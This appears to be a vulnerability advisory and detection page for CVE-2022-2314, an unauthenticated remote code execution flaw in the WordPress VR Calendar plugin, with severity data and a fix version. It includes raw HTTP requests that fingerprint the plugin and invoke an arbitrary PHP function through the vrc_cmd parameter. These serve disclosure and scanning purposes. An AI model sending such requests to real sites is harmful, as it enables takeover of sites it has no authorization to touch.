| Title | WordPress VR Calendar <=2.3.2 - Remote Code Execution |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. |
| Remediation | Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.88733 |
| CVE ID | CVE-2022-2314 |
| CWE ID | CWE-78,NVD-CWE-noinfo |
| Tags | cve cve2022 wordpress wp wp-plugin rce vr-calendar-sync unauth wpscan vr_calendar_project vkev vuln |
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Accept-Encoding: gzip
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2314.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-2314.pcap
N/AN/A